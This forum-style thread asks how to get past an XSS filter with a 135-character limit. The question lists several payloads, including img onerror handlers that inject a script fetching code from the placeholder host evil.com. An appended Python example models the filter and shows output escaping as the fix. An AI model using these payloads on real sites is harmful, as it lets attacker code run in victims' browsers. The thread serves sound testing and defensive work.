I have found a web app that is vulnerable to XSS, and can get some JavaScript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:

- </anythingyouwant> gets replaced with nothing
- /> gets replaced with nothing
- ; gets replaced with a space until the next >
- 135 character limit including method of delivery, e.g. <img src="." onerror="alert('xss')">

Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full JavaScript code. Is it possible to run an arbitrary script at all?
I have tried:

<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">
result: too long, even with a shortened URL

<script src="//evil.com/myscript" />
result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by the web app omitting the 'closing' tag

<script src=//evil.com/myscript"></script>
result: gets filtered, destroys rest of page as above

<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">
result: semicolons get filtered, breaks web page

<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">
result: I'm unsure if this is valid JS, but it appears in the Chrome "view page source" as intended, but does not work as wanted

I am using Chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

or your version with a "," instead of a ";":

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.
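As an added illustration of why the answer calls these measures insufficient (this is example code written here, not code from the question, the answer, or the affected application), the following Python models the three filters the question describes and puts them next to the mitigation a defender would actually ship: context-aware output encoding of the untrusted value. The exact behaviour of the real filter is unknown, so the modelled rules (closing tags removed, "/>" removed, a ";" and everything up to the next ">" collapsed to one space, 135-character cut) are an assumption. The probe payload is the one quoted in the question; the "benign" comment is constructed to show the collateral damage a tag-stripping blacklist does to legitimate input.

```python
import html
import re

# Constructed model of the blacklist described in the question. The real
# application's rules are not known; these are an assumption used only to
# show why a blacklist of this shape cannot be relied on.
MAX_LEN = 135                               # stated 135-character limit
CLOSING_TAG_RE = re.compile(r"</[^>]*>")    # "</anythingyouwant>" removed
SEMICOLON_RUN_RE = re.compile(r";[^>]*>")   # ";" up to the next ">" -> one space


def blacklist_filter(untrusted: str) -> str:
    """Model of the application's blacklist (assumed rules, see above)."""
    value = untrusted[:MAX_LEN]
    value = CLOSING_TAG_RE.sub("", value)
    value = value.replace("/>", "")
    value = SEMICOLON_RUN_RE.sub(" ", value)
    return value


def escape_for_html_text(untrusted: str) -> str:
    """The mitigation for data placed in an HTML text node: encode the
    characters that can change the parsing context (<, >, &, ", ').
    Nothing needs to be guessed about attacker payloads."""
    return html.escape(untrusted, quote=True)


def has_live_markup(fragment: str) -> bool:
    """True if the fragment still contains something the HTML parser will
    treat as the start of a tag (a '<' followed by a name, '/' or '!')."""
    return re.search(r"<[A-Za-z/!]", fragment) is not None


def render_comment(comment: str, sanitizer) -> str:
    """Server-side template: the untrusted comment inside a paragraph."""
    return f"<p>{sanitizer(comment)}</p>"


# The probe payload quoted in the question, and a constructed benign comment
# that uses a closing tag the way a legitimate user might.
PROBE = "<img src=\".\" onerror=\"alert('xss')\">"
BENIGN = "<b>hello</b> world"

if __name__ == "__main__":
    for label, value in (("probe", PROBE), ("benign", BENIGN)):
        # The blacklist has nothing to match in the probe, so it passes
        # untouched, while the benign comment loses its </b> and the open
        # <b> bleeds into the rest of the page.  Escaping renders both inert.
        print(label, "blacklist:", render_comment(value, blacklist_filter))
        print(label, "escaped:  ", render_comment(value, escape_for_html_text))
```

The two outcomes are the point: the blacklist leaves the event-handler probe intact because none of its three patterns occur in it, yet it mangles ordinary formatted text (the unclosed `<b>` is the "destroys the rest of the page" effect the question reports for its own payloads). Encoding for the output context neutralises the probe and preserves the benign comment as visible text, which is why the fix belongs at the template, not in a list of forbidden strings.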